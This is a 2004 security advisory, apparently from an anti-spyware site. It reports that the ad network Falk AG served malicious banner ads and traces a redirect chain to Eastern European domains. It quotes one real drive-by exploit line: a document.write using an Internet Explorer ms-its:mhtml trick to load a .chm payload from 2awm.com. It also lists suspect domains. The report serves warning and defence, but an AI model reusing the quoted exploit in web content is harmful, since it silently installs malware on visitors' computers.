Falk AG / falkag.net Serving Viruses and Trojans

22nd November 2004

(Note: this relates to incidents that happened in 2004 - to the best of our knowledge, Falk AG has not had these problems since then)

Falk AG is a major European advertising network serving up a variety of ads, including .ASP based advertisments. Falk AG is a legitimate and above-board advertising company, but it seems that some of the ads they have served in the past conceal trojans and other malware, either caused by disreputable advertisers or serious security breaches.

On 21st November 2004, popular IT new site The Register reported that Falk AG had apparently been serving ads with the Bofra virus on their site (see this report).

Early on Saturday morning some banner advertising served for The Register by third party ad serving company Falk AG became infected with the Bofra/IFrame exploit. The Register suspended ad serving by this company on discovery of the problem. [...]

We have asked Falk for an explanation and for further details of the incident, and pending this we do not intend to restart ad-serving via the company. Falk will, we understand, be making a statement regarding the matter on Monday.

Falk AG claim that they were hacked, however, this is not the first time this has happened. We posted this report to the Parasiteware board back in September 2004:

Falk eSolutions AG - http://www.falkag.de/ - is a German advertising network that allows .ASP based ads. They're not very picky about their advertisers though, they seem to allow everything from scumware pushers to blue chip customers on.

Here's a nasty little scumware trail.

Comingsoon.net is a popular movies site (Alexa rank 8643). It buys advertising from Falk AG - typically routing through falkag.net. [...]

One of these is a popup banner for an outfit called ntsearch.com based in Russia. [...]

The redirector I get is http:// www.ntsearch.com /uk_in.php?acc=zon10 DO NOT VISIT THIS

This bounced through 64.246.46.32 (EV1.NET) to http:// 2awm.com/ 309.php DO NOT VISIT THIS based in the Czech Republic:

What we get on the 2awm.com server is a line containing:

document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://www.2awm.com /file/309.chm::/1.htm"))

REALLY REALLY DON'T CLICK THIS

This uses a well-known IE exploit to install some sort of crapware. In this case it looks like a variant of CoolWebSearch (CWS) (i.e. about the worst trojan you can get).

[...]

At no point was the user asked permission to install this software. The originating site (Comingsoon.net) is only guilty of make a bad choice of advertising network. Apart from the obvious wrongdoing by the CWS pushers, it's clear that Falk AG is happy to take the money from the scumware merchants.

Other suspect domains

These are hosted on the Ukranian server:
2awm.com
Awmgate.com
Check-wire.com
Lab-wire.com
Online-more.com
Find-by-web.com
Search4www.com

falkag.net seems to split traffic between US and European targetted servers:
* as-us.falkag.net ~ 60%
* as-eu.falkag.net ~ 40%

If you're a network administrator, I'd suggest blocking access to all of falkag.net.

If you're an advertiser, I'd suggest reconsidering your relationship, and if you're a publisher I would pull those ads right now before you get the blame for spreading spyware.

The underlying problem to us seems to be that Falk AG allows a wide variety of ad types, and due to the inherent security flaws in Internet Explorer, there are several possible ways that Falk AG "customers" can exploit these vulernabilities. Due to this, Falk AG should be employing some sort of screening process, but it appears that it does not.

Our advice remains unchanged: network administrators should block access to the falkag.net servers at their firewalls and web site operators should remove Falk AG ads from their sites.